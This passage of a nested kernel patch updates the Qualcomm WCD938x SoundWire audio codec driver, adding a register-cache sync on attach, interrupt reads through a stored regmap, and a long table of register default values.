++		/* Write out any cached changes that happened between probe and attach */
++		regcache_cache_only(wcd->regmap, false);
++		return regcache_sync(wcd->regmap);
++	}
++
+ 	return 0;
+ }
+ 
+@@ -177,21 +185,1015 @@ static int wcd9380_interrupt_callback(struct sdw_slave *slave,
+ {
+ 	struct wcd938x_sdw_priv *wcd = dev_get_drvdata(&slave->dev);
+ 	struct irq_domain *slave_irq = wcd->slave_irq;
+-	struct regmap *regmap = dev_get_regmap(&slave->dev, NULL);
+ 	u32 sts1, sts2, sts3;
+ 
+ 	do {
+ 		handle_nested_irq(irq_find_mapping(slave_irq, 0));
+-		regmap_read(regmap, WCD938X_DIGITAL_INTR_STATUS_0, &sts1);
+-		regmap_read(regmap, WCD938X_DIGITAL_INTR_STATUS_1, &sts2);
+-		regmap_read(regmap, WCD938X_DIGITAL_INTR_STATUS_2, &sts3);
++		regmap_read(wcd->regmap, WCD938X_DIGITAL_INTR_STATUS_0, &sts1);
++		regmap_read(wcd->regmap, WCD938X_DIGITAL_INTR_STATUS_1, &sts2);
++		regmap_read(wcd->regmap, WCD938X_DIGITAL_INTR_STATUS_2, &sts3);
+ 
+ 	} while (sts1 || sts2 || sts3);
+ 
+ 	return IRQ_HANDLED;
+ }
+ 
+-static struct sdw_slave_ops wcd9380_slave_ops = {
++static const struct reg_default wcd938x_defaults[] = {
++	{WCD938X_ANA_PAGE_REGISTER,                            0x00},
++	{WCD938X_ANA_BIAS,                                     0x00},
++	{WCD938X_ANA_RX_SUPPLIES,                              0x00},
++	{WCD938X_ANA_HPH,                                      0x0C},
++	{WCD938X_ANA_EAR,                                      0x00},
++	{WCD938X_ANA_EAR_COMPANDER_CTL,                        0x02},
++	{WCD938X_ANA_TX_CH1,                                   0x20},
++	{WCD938X_ANA_TX_CH2,                                   0x00},
++	{WCD938X_ANA_TX_CH3,                                   0x20},
++	{WCD938X_ANA_TX_CH4,                                   0x00},
++	{WCD938X_ANA_MICB1_MICB2_DSP_EN_LOGIC,                 0x00},
++	{WCD938X_ANA_MICB3_DSP_EN_LOGIC,                       0x00},
++	{WCD938X_ANA_MBHC_MECH,                                0x39},
++	{WCD938X_ANA_MBHC_ELECT,                               0x08},
++	{WCD938X_ANA_MBHC_ZDET,                                0x00},
++	{WCD938X_ANA_MBHC_RESULT_1,                            0x00},
++	{WCD938X_ANA_MBHC_RESULT_2,                            0x00},
++	{WCD938X_ANA_MBHC_RESULT_3,                            0x00},
++	{WCD938X_ANA_MBHC_BTN0,                                0x00},
++	{WCD938X_ANA_MBHC_BTN1,                                0x10},
++	{WCD938X_ANA_MBHC_BTN2,                                0x20},
++	{WCD938X_ANA_MBHC_BTN3,                                0x30},
++	{WCD938X_ANA_MBHC_BTN4,                                0x40},
++	{WCD938X_ANA_MBHC_BTN5,                                0x50},
++	{WCD938X_ANA_MBHC_BTN6,                                0x60},
++	{WCD938X_ANA_MBHC_BTN7,                                0x70},
++	{WCD938X_ANA_MICB1,                                    0x10},
++	{WCD938X_ANA_MICB2,                                    0x10},
++	{WCD938X_ANA_MICB2_RAMP,                               0x00},
++	{WCD938X_ANA_MICB3,                                    0x10},
++	{WCD938X_ANA_MICB4,                                    0x10},
++	{WCD938X_BIAS_CTL,                                     0x2A},
++	{WCD938X_BIAS_VBG_FINE_ADJ,                            0x55},
++	{WCD938X_LDOL_VDDCX_ADJUST,                            0x01},
++	{WCD938X_LDOL_DISABLE_LDOL,                            0x00},
++	{WCD938X_MBHC_CTL_CLK,                                 0x00},
++	{WCD938X_MBHC_CTL_ANA,                                 0x00},
++	{WCD938X_MBHC_CTL_SPARE_1,                             0x00},
++	{WCD938X_MBHC_CTL_SPARE_2,                             0x00},
++	{WCD938X_MBHC_CTL_BCS,                                 0x00},
++	{WCD938X_MBHC_MOISTURE_DET_FSM_STATUS,                 0x00},
++	{WCD938X_MBHC_TEST_CTL,                                0x00},
++	{WCD938X_LDOH_MODE,                                    0x2B},
++	{WCD938X_LDOH_BIAS,                                    0x68},
++	{WCD938X_LDOH_STB_LOADS,                               0x00},
++	{WCD938X_LDOH_SLOWRAMP,                                0x50},
++	{WCD938X_MICB1_TEST_CTL_1,                             0x1A},
++	{WCD938X_MICB1_TEST_CTL_2,                             0x00},
++	{WCD938X_MICB1_TEST_CTL_3,                             0xA4},
++	{WCD938X_MICB2_TEST_CTL_1,                             0x1A},
++	{WCD938X_MICB2_TEST_CTL_2,                             0x00},
++	{WCD938X_MICB2_TEST_CTL_3,                             0x24},
++	{WCD938X_MICB3_TEST_CTL_1,                             0x1A},
++	{WCD938X_MICB3_TEST_CTL_2,                             0x00},
++	{WCD938X_MICB3_TEST_CTL_3,                             0xA4},
++	{WCD938X_MICB4_TEST_CTL_1,                             0x1A},
++	{WCD938X_MICB4_TEST_CTL_2,                             0x00},
++	{WCD938X_MICB4_TEST_CTL_3,                             0xA4},
++	{WCD938X_TX_COM_ADC_VCM,                               0x39},
++	{WCD938X_TX_COM_BIAS_ATEST,                            0xE0},
++	{WCD938X_TX_COM_SPARE1,                                0x00},
++	{WCD938X_TX_COM_SPARE2,                                0x00},
++	{WCD938X_TX_COM_TXFE_DIV_CTL,                          0x22},
++	{WCD938X_TX_COM_TXFE_DIV_START,                        0x00},
++	{WCD938X_TX_COM_SPARE3,                                0x00},
++	{WCD938X_TX_COM_SPARE4,                                0x00},
++	{WCD938X_TX_1_2_TEST_EN,                               0xCC},
++	{WCD938X_TX_1_2_ADC_IB,                                0xE9},
++	{WCD938X_TX_1_2_ATEST_REFCTL,                          0x0A},
++	{WCD938X_TX_1_2_TEST_CTL,                              0x38},
++	{WCD938X_TX_1_2_TEST_BLK_EN1,                          0xFF},
++	{WCD938X_TX_1_2_TXFE1_CLKDIV,                          0x00},
++	{WCD938X_TX_1_2_SAR2_ERR,                              0x00},
++	{WCD938X_TX_1_2_SAR1_ERR,                              0x00},
++	{WCD938X_TX_3_4_TEST_EN,                               0xCC},
++	{WCD938X_TX_3_4_ADC_IB,                                0xE9},
++	{WCD938X_TX_3_4_ATEST_REFCTL,                          0x0A},
++	{WCD938X_TX_3_4_TEST_CTL,                              0x38},
++	{WCD938X_TX_3_4_TEST_BLK_EN3,                          0xFF},
++	{WCD938X_TX_3_4_TXFE3_CLKDIV,                          0x00},
++	{WCD938X_TX_3_4_SAR4_ERR,                              0x00},
++	{WCD938X_TX_3_4_SAR3_ERR,                              0x00},
++	{WCD938X_TX_3_4_TEST_BLK_EN2,                          0xFB},
++	{WCD938X_TX_3_4_TXFE2_CLKDIV,                          0x00},
++	{WCD938X_TX_3_4_SPARE1,                                0x00},
++	{WCD938X_TX_3_4_TEST_BLK_EN4,                          0xFB},
++	{WCD938X_TX_3_4_TXFE4_CLKDIV,                          0x00},
++	{WCD938X_TX_3_4_SPARE2,                                0x00},
++	{WCD938X_CLASSH_MODE_1,                                0x40},
++	{WCD938X_CLASSH_MODE_2,                                0x3A},
++	{WCD938X_CLASSH_MODE_3,                                0x00},
++	{WCD938X_CLASSH_CTRL_VCL_1,                            0x70},
++	{WCD938X_CLASSH_CTRL_VCL_2,                            0x82},
++	{WCD938X_CLASSH_CTRL_CCL_1,                            0x31},
++	{WCD938X_CLASSH_CTRL_CCL_2,                            0x80},
++	{WCD938X_CLASSH_CTRL_CCL_3,                            0x80},
++	{WCD938X_CLASSH_CTRL_CCL_4,                            0x51},
++	{WCD938X_CLASSH_CTRL_CCL_5,                            0x00},
++	{WCD938X_CLASSH_BUCK_TMUX_A_D,                         0x00},
++	{WCD938X_CLASSH_BUCK_SW_DRV_CNTL,                      0x77},
++	{WCD938X_CLASSH_SPARE,                                 0x00},
++	{WCD938X_FLYBACK_EN,                                   0x4E},
++	{WCD938X_FLYBACK_VNEG_CTRL_1,                          0x0B},
++	{WCD938X_FLYBACK_VNEG_CTRL_2,                          0x45},
++	{WCD938X_FLYBACK_VNEG_CTRL_3,                          0x74},
++	{WCD938X_FLYBACK_VNEG_CTRL_4,                          0x7F},
++	{WCD938X_FLYBACK_VNEG_CTRL_5,                          0x83},
++	{WCD938X_FLYBACK_VNEG_CTRL_6,                          0x98},
++	{WCD938X_FLYBACK_VNEG_CTRL_7,                          0xA9},
++	{WCD938X_FLYBACK_VNEG_CTRL_8,                          0x68},
++	{WCD938X_FLYBACK_VNEG_CTRL_9,                          0x64},
++	{WCD938X_FLYBACK_VNEGDAC_CTRL_1,                       0xED},
++	{WCD938X_FLYBACK_VNEGDAC_CTRL_2,                       0xF0},
++	{WCD938X_FLYBACK_VNEGDAC_CTRL_3,                       0xA6},
++	{WCD938X_FLYBACK_CTRL_1,                               0x65},
++	{WCD938X_FLYBACK_TEST_CTL,                             0x00},
++	{WCD938X_RX_AUX_SW_CTL,                                0x00},
++	{WCD938X_RX_PA_AUX_IN_CONN,                            0x01},
++	{WCD938X_RX_TIMER_DIV,                                 0x32},
++	{WCD938X_RX_OCP_CTL,                                   0x1F},
++	{WCD938X_RX_OCP_COUNT,                                 0x77},
++	{WCD938X_RX_BIAS_EAR_DAC,                              0xA0},
++	{WCD938X_RX_BIAS_EAR_AMP,                              0xAA},
++	{WCD938X_RX_BIAS_HPH_LDO,                              0xA9},
++	{WCD938X_RX_BIAS_HPH_PA,                               0xAA},
++	{WCD938X_RX_BIAS_HPH_RDACBUFF_CNP2,                    0x8A},
++	{WCD938X_RX_BIAS_HPH_RDAC_LDO,                         0x88},
++	{WCD938X_RX_BIAS_HPH_CNP1,                             0x82},
++	{WCD938X_RX_BIAS_HPH_LOWPOWER,                         0x82},
++	{WCD938X_RX_BIAS_AUX_DAC,                              0xA0},
++	{WCD938X_RX_BIAS_AUX_AMP,                              0xAA},
++	{WCD938X_RX_BIAS_VNEGDAC_BLEEDER,                      0x50},
++	{WCD938X_RX_BIAS_MISC,                                 0x00},
++	{WCD938X_RX_BIAS_BUCK_RST,                             0x08},
++	{WCD938X_RX_BIAS_BUCK_VREF_ERRAMP,                     0x44},
++	{WCD938X_RX_BIAS_FLYB_ERRAMP,                          0x40},
++	{WCD938X_RX_BIAS_FLYB_BUFF,                            0xAA},
++	{WCD938X_RX_BIAS_FLYB_MID_RST,                         0x14},
++	{WCD938X_HPH_L_STATUS,                                 0x04},
++	{WCD938X_HPH_R_STATUS,                                 0x04},
++	{WCD938X_HPH_CNP_EN,                                   0x80},
++	{WCD938X_HPH_CNP_WG_CTL,                               0x9A},
++	{WCD938X_HPH_CNP_WG_TIME,                              0x14},
++	{WCD938X_HPH_OCP_CTL,                                  0x28},
++	{WCD938X_HPH_AUTO_CHOP,                                0x16},
++	{WCD938X_HPH_CHOP_CTL,                                 0x83},
++	{WCD938X_HPH_PA_CTL1,                                  0x46},
++	{WCD938X_HPH_PA_CTL2,                                  0x50},
++	{WCD938X_HPH_L_EN,                                     0x80},
++	{WCD938X_HPH_L_TEST,                                   0xE0},
++	{WCD938X_HPH_L_ATEST,                                  0x50},
++	{WCD938X_HPH_R_EN,                                     0x80},
++	{WCD938X_HPH_R_TEST,                                   0xE0},
++	{WCD938X_HPH_R_ATEST,                                  0x54},
++	{WCD938X_HPH_RDAC_CLK_CTL1,                            0x99},
++	{WCD938X_HPH_RDAC_CLK_CTL2,                            0x9B},
++	{WCD938X_HPH_RDAC_LDO_CTL,                             0x33},
++	{WCD938X_HPH_RDAC_CHOP_CLK_LP_CTL,                     0x00},
++	{WCD938X_HPH_REFBUFF_UHQA_CTL,                         0x68},
++	{WCD938X_HPH_REFBUFF_LP_CTL,                           0x0E},
++	{WCD938X_HPH_L_DAC_CTL,                                0x20},
++	{WCD938X_HPH_R_DAC_CTL,                                0x20},
++	{WCD938X_HPH_SURGE_HPHLR_SURGE_COMP_SEL,               0x55},
++	{WCD938X_HPH_SURGE_HPHLR_SURGE_EN,                     0x19},
++	{WCD938X_HPH_SURGE_HPHLR_SURGE_MISC1,                  0xA0},
++	{WCD938X_HPH_SURGE_HPHLR_SURGE_STATUS,                 0x00},
++	{WCD938X_EAR_EAR_EN_REG,                               0x22},
++	{WCD938X_EAR_EAR_PA_CON,                               0x44},
++	{WCD938X_EAR_EAR_SP_CON,                               0xDB},
++	{WCD938X_EAR_EAR_DAC_CON,                              0x80},
++	{WCD938X_EAR_EAR_CNP_FSM_CON,                          0xB2},
++	{WCD938X_EAR_TEST_CTL,                                 0x00},
++	{WCD938X_EAR_STATUS_REG_1,                             0x00},
++	{WCD938X_EAR_STATUS_REG_2,                             0x08},
++	{WCD938X_ANA_NEW_PAGE_REGISTER,                        0x00},
++	{WCD938X_HPH_NEW_ANA_HPH2,                             0x00},
++	{WCD938X_HPH_NEW_ANA_HPH3,                             0x00},
++	{WCD938X_SLEEP_CTL,                                    0x16},
++	{WCD938X_SLEEP_WATCHDOG_CTL,                           0x00},
++	{WCD938X_MBHC_NEW_ELECT_REM_CLAMP_CTL,                 0x00},
++	{WCD938X_MBHC_NEW_CTL_1,                               0x02},
++	{WCD938X_MBHC_NEW_CTL_2,                               0x05},
++	{WCD938X_MBHC_NEW_PLUG_DETECT_CTL,                     0xE9},
++	{WCD938X_MBHC_NEW_ZDET_ANA_CTL,                        0x0F},
++	{WCD938X_MBHC_NEW_ZDET_RAMP_CTL,                       0x00},
++	{WCD938X_MBHC_NEW_FSM_STATUS,                          0x00},
++	{WCD938X_MBHC_NEW_ADC_RESULT,                          0x00},
++	{WCD938X_TX_NEW_AMIC_MUX_CFG,                          0x00},
++	{WCD938X_AUX_AUXPA,                                    0x00},
++	{WCD938X_LDORXTX_MODE,                                 0x0C},
++	{WCD938X_LDORXTX_CONFIG,                               0x10},
++	{WCD938X_DIE_CRACK_DIE_CRK_DET_EN,                     0x00},
++	{WCD938X_DIE_CRACK_DIE_CRK_DET_OUT,                    0x00},
++	{WCD938X_HPH_NEW_INT_RDAC_GAIN_CTL,                    0x40},
++	{WCD938X_HPH_NEW_INT_RDAC_HD2_CTL_L,                   0x81},
++	{WCD938X_HPH_NEW_INT_RDAC_VREF_CTL,                    0x10},
++	{WCD938X_HPH_NEW_INT_RDAC_OVERRIDE_CTL,                0x00},
++	{WCD938X_HPH_NEW_INT_RDAC_HD2_CTL_R,                   0x81},
++	{WCD938X_HPH_NEW_INT_PA_MISC1,                         0x22},
++	{WCD938X_HPH_NEW_INT_PA_MISC2,                         0x00},
++	{WCD938X_HPH_NEW_INT_PA_RDAC_MISC,                     0x00},
++	{WCD938X_HPH_NEW_INT_HPH_TIMER1,                       0xFE},
++	{WCD938X_HPH_NEW_INT_HPH_TIMER2,                       0x02},
++	{WCD938X_HPH_NEW_INT_HPH_TIMER3,                       0x4E},
++	{WCD938X_HPH_NEW_INT_HPH_TIMER4,                       0x54},
++	{WCD938X_HPH_NEW_INT_PA_RDAC_MISC2,                    0x00},
++	{WCD938X_HPH_NEW_INT_PA_RDAC_MISC3,                    0x00},
++	{WCD938X_HPH_NEW_INT_RDAC_HD2_CTL_L_NEW,               0x90},
++	{WCD938X_HPH_NEW_INT_RDAC_HD2_CTL_R_NEW,               0x90},
++	{WCD938X_RX_NEW_INT_HPH_RDAC_BIAS_LOHIFI,              0x62},
++	{WCD938X_RX_NEW_INT_HPH_RDAC_BIAS_ULP,                 0x01},
++	{WCD938X_RX_NEW_INT_HPH_RDAC_LDO_LP,                   0x11},
++	{WCD938X_MBHC_NEW_INT_MOISTURE_DET_DC_CTRL,            0x57},
++	{WCD938X_MBHC_NEW_INT_MOISTURE_DET_POLLING_CTRL,       0x01},
++	{WCD938X_MBHC_NEW_INT_MECH_DET_CURRENT,                0x00},
++	{WCD938X_MBHC_NEW_INT_SPARE_2,                         0x00},
++	{WCD938X_EAR_INT_NEW_EAR_CHOPPER_CON,                  0xA8},
++	{WCD938X_EAR_INT_NEW_CNP_VCM_CON1,                     0x42},
++	{WCD938X_EAR_INT_NEW_CNP_VCM_CON2,                     0x22},
++	{WCD938X_EAR_INT_NEW_EAR_DYNAMIC_BIAS,                 0x00},
++	{WCD938X_AUX_INT_EN_REG,                               0x00},
++	{WCD938X_AUX_INT_PA_CTRL,                              0x06},
++	{WCD938X_AUX_INT_SP_CTRL,                              0xD2},
++	{WCD938X_AUX_INT_DAC_CTRL,                             0x80},
++	{WCD938X_AUX_INT_CLK_CTRL,                             0x50},
++	{WCD938X_AUX_INT_TEST_CTRL,                            0x00},
++	{WCD938X_AUX_INT_STATUS_REG,                           0x00},
++	{WCD938X_AUX_INT_MISC,                                 0x00},
++	{WCD938X_LDORXTX_INT_BIAS,                             0x6E},
++	{WCD938X_LDORXTX_INT_STB_LOADS_DTEST,                  0x50},
++	{WCD938X_LDORXTX_INT_TEST0,                            0x1C},
++	{WCD938X_LDORXTX_INT_STARTUP_TIMER,                    0xFF},
++	{WCD938X_LDORXTX_INT_TEST1,                            0x1F},
++	{WCD938X_LDORXTX_INT_STATUS,                           0x00},
++	{WCD938X_SLEEP_INT_WATCHDOG_CTL_1,                     0x0A},
++	{WCD938X_SLEEP_INT_WATCHDOG_CTL_2,                     0x0A},
++	{WCD938X_DIE_CRACK_INT_DIE_CRK_DET_INT1,               0x02},
++	{WCD938X_DIE_CRACK_INT_DIE_CRK_DET_INT2,               0x60},
++	{WCD938X_TX_COM_NEW_INT_TXFE_DIVSTOP_L2,               0xFF},
++	{WCD938X_TX_COM_NEW_INT_TXFE_DIVSTOP_L1,               0x7F},
++	{WCD938X_TX_COM_NEW_INT_TXFE_DIVSTOP_L0,               0x3F},
++	{WCD938X_TX_COM_NEW_INT_TXFE_DIVSTOP_ULP1P2M,          0x1F},
++	{WCD938X_TX_COM_NEW_INT_TXFE_DIVSTOP_ULP0P6M,          0x0F},
++	{WCD938X_TX_COM_NEW_INT_TXFE_ICTRL_STG1_L2L1,          0xD7},
++	{WCD938X_TX_COM_NEW_INT_TXFE_ICTRL_STG1_L0,            0xC8},
++	{WCD938X_TX_COM_NEW_INT_TXFE_ICTRL_STG1_ULP,           0xC6},
++	{WCD938X_TX_COM_NEW_INT_TXFE_ICTRL_STG2MAIN_L2L1,      0xD5},
++	{WCD938X_TX_COM_NEW_INT_TXFE_ICTRL_STG2MAIN_L0,        0xCA},
++	{WCD938X_TX_COM_NEW_INT_TXFE_ICTRL_STG2MAIN_ULP,       0x05},
++	{WCD938X_TX_COM_NEW_INT_TXFE_ICTRL_STG2CASC_L2L1L0,    0xA5},
++	{WCD938X_TX_COM_NEW_INT_TXFE_ICTRL_STG2CASC_ULP,       0x13},
++	{WCD938X_TX_COM_NEW_INT_TXADC_SCBIAS_L2L1,             0x88},
++	{WCD938X_TX_COM_NEW_INT_TXADC_SCBIAS_L0ULP,            0x42},
++	{WCD938X_TX_COM_NEW_INT_TXADC_INT_L2,                  0xFF},
++	{WCD938X_TX_COM_NEW_INT_TXADC_INT_L1,                  0x64},
++	{WCD938X_TX_COM_NEW_INT_TXADC_INT_L0,                  0x64},
++	{WCD938X_TX_COM_NEW_INT_TXADC_INT_ULP,                 0x77},
++	{WCD938X_DIGITAL_PAGE_REGISTER,                        0x00},
++	{WCD938X_DIGITAL_CHIP_ID0,                             0x00},
++	{WCD938X_DIGITAL_CHIP_ID1,                             0x00},
++	{WCD938X_DIGITAL_CHIP_ID2,                             0x0D},
++	{WCD938X_DIGITAL_CHIP_ID3,                             0x01},
++	{WCD938X_DIGITAL_SWR_TX_CLK_RATE,                      0x00},
++	{WCD938X_DIGITAL_CDC_RST_CTL,                          0x03},
++	{WCD938X_DIGITAL_TOP_CLK_CFG,                          0x00},
++	{WCD938X_DIGITAL_CDC_ANA_CLK_CTL,                      0x00},
++	{WCD938X_DIGITAL_CDC_DIG_CLK_CTL,                      0xF0},
++	{WCD938X_DIGITAL_SWR_RST_EN,                           0x00},
++	{WCD938X_DIGITAL_CDC_PATH_MODE,                        0x55},
++	{WCD938X_DIGITAL_CDC_RX_RST,                           0x00},
++	{WCD938X_DIGITAL_CDC_RX0_CTL,                          0xFC},
++	{WCD938X_DIGITAL_CDC_RX1_CTL,                          0xFC},
++	{WCD938X_DIGITAL_CDC_RX2_CTL,                          0xFC},
++	{WCD938X_DIGITAL_CDC_TX_ANA_MODE_0_1,                  0x00},
++	{WCD938X_DIGITAL_CDC_TX_ANA_MODE_2_3,                  0x00},
++	{WCD938X_DIGITAL_CDC_COMP_CTL_0,                       0x00},
++	{WCD938X_DIGITAL_CDC_ANA_TX_CLK_CTL,                   0x1E},
++	{WCD938X_DIGITAL_CDC_HPH_DSM_A1_0,                     0x00},
++	{WCD938X_DIGITAL_CDC_HPH_DSM_A1_1,                     0x01},
++	{WCD938X_DIGITAL_CDC_HPH_DSM_A2_0,                     0x63},
++	{WCD938X_DIGITAL_CDC_HPH_DSM_A2_1,                     0x04},
++	{WCD938X_DIGITAL_CDC_HPH_DSM_A3_0,                     0xAC},
++	{WCD938X_DIGITAL_CDC_HPH_DSM_A3_1,                     0x04},
++	{WCD938X_DIGITAL_CDC_HPH_DSM_A4_0,                     0x1A},
++	{WCD938X_DIGITAL_CDC_HPH_DSM_A4_1,                     0x03},
++	{WCD938X_DIGITAL_CDC_HPH_DSM_A5_0,                     0xBC},
++	{WCD938X_DIGITAL_CDC_HPH_DSM_A5_1,                     0x02},
++	{WCD938X_DIGITAL_CDC_HPH_DSM_A6_0,                     0xC7},
++	{WCD938X_DIGITAL_CDC_HPH_DSM_A7_0,                     0xF8},
++	{WCD938X_DIGITAL_CDC_HPH_DSM_C_0,                      0x47},
++	{WCD938X_DIGITAL_CDC_HPH_DSM_C_1,                      0x43},
++	{WCD938X_DIGITAL_CDC_HPH_DSM_C_2,                      0xB1},
++	{WCD938X_DIGITAL_CDC_HPH_DSM_C_3,                      0x17},
++	{WCD938X_DIGITAL_CDC_HPH_DSM_R1,                       0x4D},
++	{WCD938X_DIGITAL_CDC_HPH_DSM_R2,                       0x29},
++	{WCD938X_DIGITAL_CDC_HPH_DSM_R3,                       0x34},
++	{WCD938X_DIGITAL_CDC_HPH_DSM_R4,                       0x59},
++	{WCD938X_DIGITAL_CDC_HPH_DSM_R5,                       0x66},
++	{WCD938X_DIGITAL_CDC_HPH_DSM_R6,                       0x87},
++	{WCD938X_DIGITAL_CDC_HPH_DSM_R7,                       0x64},
++	{WCD938X_DIGITAL_CDC_AUX_DSM_A1_0,                     0x00},
++	{WCD938X_DIGITAL_CDC_AUX_DSM_A1_1,                     0x01},
++	{WCD938X_DIGITAL_CDC_AUX_DSM_A2_0,                     0x96},
++	{WCD938X_DIGITAL_CDC_AUX_DSM_A2_1,                     0x09},
++	{WCD938X_DIGITAL_CDC_AUX_DSM_A3_0,                     0xAB},
++	{WCD938X_DIGITAL_CDC_AUX_DSM_A3_1,                     0x05},
++	{WCD938X_DIGITAL_CDC_AUX_DSM_A4_0,                     0x1C},
++	{WCD938X_DIGITAL_CDC_AUX_DSM_A4_1,                     0x02},
++	{WCD938X_DIGITAL_CDC_AUX_DSM_A5_0,                     0x17},
++	{WCD938X_DIGITAL_CDC_AUX_DSM_A5_1,                     0x02},
++	{WCD938X_DIGITAL_CDC_AUX_DSM_A6_0,                     0xAA},
++	{WCD938X_DIGITAL_CDC_AUX_DSM_A7_0,                     0xE3},
++	{WCD938X_DIGITAL_CDC_AUX_DSM_C_0,                      0x69},
++	{WCD938X_DIGITAL_CDC_AUX_DSM_C_1,                      0x54},
++	{WCD938X_DIGITAL_CDC_AUX_DSM_C_2,                      0x02},
++	{WCD938X_DIGITAL_CDC_AUX_DSM_C_3,                      0x15},
++	{WCD938X_DIGITAL_CDC_AUX_DSM_R1,                       0xA4},
++	{WCD938X_DIGITAL_CDC_AUX_DSM_R2,                       0xB5},
++	{WCD938X_DIGITAL_CDC_AUX_DSM_R3,                       0x86},
++	{WCD938X_DIGITAL_CDC_AUX_DSM_R4,                       0x85},
++	{WCD938X_DIGITAL_CDC_AUX_DSM_R5,                       0xAA},
++	{WCD938X_DIGITAL_CDC_AUX_DSM_R6,                       0xE2},
++	{WCD938X_DIGITAL_CDC_AUX_DSM_R7,                       0x62},
++	{WCD938X_DIGITAL_CDC_HPH_GAIN_RX_0,                    0x55},
++	{WCD938X_DIGITAL_CDC_HPH_GAIN_RX_1,                    0xA9},
++	{WCD938X_DIGITAL_CDC_HPH_GAIN_DSD_0,                   0x3D},
++	{WCD938X_DIGITAL_CDC_HPH_GAIN_DSD_1,                   0x2E},
++	{WCD938X_DIGITAL_CDC_HPH_GAIN_DSD_2,                   0x01},
++	{WCD938X_DIGITAL_CDC_AUX_GAIN_DSD_0,                   0x00},
++	{WCD938X_DIGITAL_CDC_AUX_GAIN_DSD_1,                   0xFC},
++	{WCD938X_DIGITAL_CDC_AUX_GAIN_DSD_2,                   0x01},
++	{WCD938X_DIGITAL_CDC_HPH_GAIN_CTL,                     0x00},
++	{WCD938X_DIGITAL_CDC_AUX_GAIN_CTL,                     0x00},
++	{WCD938X_DIGITAL_CDC_EAR_PATH_CTL,                     0x00},
++	{WCD938X_DIGITAL_CDC_SWR_CLH,                          0x00},
++	{WCD938X_DIGITAL_SWR_CLH_BYP,                          0x00},
++	{WCD938X_DIGITAL_CDC_TX0_CTL,                          0x68},
++	{WCD938X_DIGITAL_CDC_TX1_CTL,                          0x68},
++	{WCD938X_DIGITAL_CDC_TX2_CTL,                          0x68},
++	{WCD938X_DIGITAL_CDC_TX_RST,                           0x00},
++	{WCD938X_DIGITAL_CDC_REQ_CTL,                          0x01},
++	{WCD938X_DIGITAL_CDC_RST,                              0x00},
++	{WCD938X_DIGITAL_CDC_AMIC_CTL,                         0x0F},
++	{WCD938X_DIGITAL_CDC_DMIC_CTL,                         0x04},
++	{WCD938X_DIGITAL_CDC_DMIC1_CTL,                        0x01},
++	{WCD938X_DIGITAL_CDC_DMIC2_CTL,                        0x01},
++	{WCD938X_DIGITAL_CDC_DMIC3_CTL,                        0x01},
++	{WCD938X_DIGITAL_CDC_DMIC4_CTL,                        0x01},
++	{WCD938X_DIGITAL_EFUSE_PRG_CTL,                        0x00},
++	{WCD938X_DIGITAL_EFUSE_CTL,                            0x2B},
++	{WCD938X_DIGITAL_CDC_DMIC_RATE_1_2,                    0x11},
++	{WCD938X_DIGITAL_CDC_DMIC_RATE_3_4,                    0x11},
++	{WCD938X_DIGITAL_PDM_WD_CTL0,                          0x00},
++	{WCD938X_DIGITAL_PDM_WD_CTL1,                          0x00},
++	{WCD938X_DIGITAL_PDM_WD_CTL2,                          0x00},
++	{WCD938X_DIGITAL_INTR_MODE,                            0x00},
++	{WCD938X_DIGITAL_INTR_MASK_0,                          0xFF},
++	{WCD938X_DIGITAL_INTR_MASK_1,                          0xFF},
++	{WCD938X_DIGITAL_INTR_MASK_2,                          0x3F},
++	{WCD938X_DIGITAL_INTR_STATUS_0,                        0x00},
++	{WCD938X_DIGITAL_INTR_STATUS_1,                        0x00},
++	{WCD938X_DIGITAL_INTR_STATUS_2,                        0x00},
++	{WCD938X_DIGITAL_INTR_CLEAR_0,                         0x00},
++	{WCD938X_DIGITAL_INTR_CLEAR_1,                         0x00},
++	{WCD938X_DIGITAL_INTR_CLEAR_2,                         0x00},
++	{WCD938X_DIGITAL_INTR_LEVEL_0,                         0x00},
++	{WCD938X_DIGITAL_INTR_LEVEL_1,                         0x00},
++	{WCD938X_DIGITAL_INTR_LEVEL_2,                         0x00},
++	{WCD938X_DIGITAL_INTR_SET_0,                           0x00},
++	{WCD938X_DIGITAL_INTR_SET_1,                           0x00},
++	{WCD938X_DIGITAL_INTR_SET_2,                           0x00},
++	{WCD938X_DIGITAL_INTR_TEST_0,                          0x00},
++	{WCD938X_DIGITAL_INTR_TEST_1,                          0x00},
++	{WCD938X_DIGITAL_INTR_TEST_2,                          0x00},
++	{WCD938X_DIGITAL_TX_MODE_DBG_EN,                       0x00},
++	{WCD938X_DIGITAL_TX_MODE_DBG_0_1,                      0x00},
++	{WCD938X_DIGITAL_TX_MODE_DBG_2_3,                      0x00},
++	{WCD938X_DIGITAL_LB_IN_SEL_CTL,                        0x00},
++	{WCD938X_DIGITAL_LOOP_BACK_MODE,                       0x00},
++	{WCD938X_DIGITAL_SWR_DAC_TEST,                         0x00},
++	{WCD938X_DIGITAL_SWR_HM_TEST_RX_0,                     0x40},
++	{WCD938X_DIGITAL_SWR_HM_TEST_TX_0,                     0x40},
++	{WCD938X_DIGITAL_SWR_HM_TEST_RX_1,                     0x00},
++	{WCD938X_DIGITAL_SWR_HM_TEST_TX_1,                     0x00},
++	{WCD938X_DIGITAL_SWR_HM_TEST_TX_2,                     0x00},
++	{WCD938X_DIGITAL_SWR_HM_TEST_0,                        0x00},
++	{WCD938X_DIGITAL_SWR_HM_TEST_1,                        0x00},
++	{WCD938X_DIGITAL_PAD_CTL_SWR_0,                        0x8F},
++	{WCD938X_DIGITAL_PAD_CTL_SWR_1,                        0x06},
++	{WCD938X_DIGITAL_I2C_CTL,                              0x00},
++	{WCD938X_DIGITAL_CDC_TX_TANGGU_SW_MODE,                0x00},
++	{WCD938X_DIGITAL_EFUSE_TEST_CTL_0,                     0x00},
++	{WCD938X_DIGITAL_EFUSE_TEST_CTL_1,                     0x00},
++	{WCD938X_DIGITAL_EFUSE_T_DATA_0,                       0x00},
++	{WCD938X_DIGITAL_EFUSE_T_DATA_1,                       0x00},
++	{WCD938X_DIGITAL_PAD_CTL_PDM_RX0,                      0xF1},
++	{WCD938X_DIGITAL_PAD_CTL_PDM_RX1,                      0xF1},
++	{WCD938X_DIGITAL_PAD_CTL_PDM_TX0,                      0xF1},
++	{WCD938X_DIGITAL_PAD_CTL_PDM_TX1,                      0xF1},
++	{WCD938X_DIGITAL_PAD_CTL_PDM_TX2,                      0xF1},
++	{WCD938X_DIGITAL_PAD_INP_DIS_0,                        0x00},
++	{WCD938X_DIGITAL_PAD_INP_DIS_1,                        0x00},
++	{WCD938X_DIGITAL_DRIVE_STRENGTH_0,                     0x00},
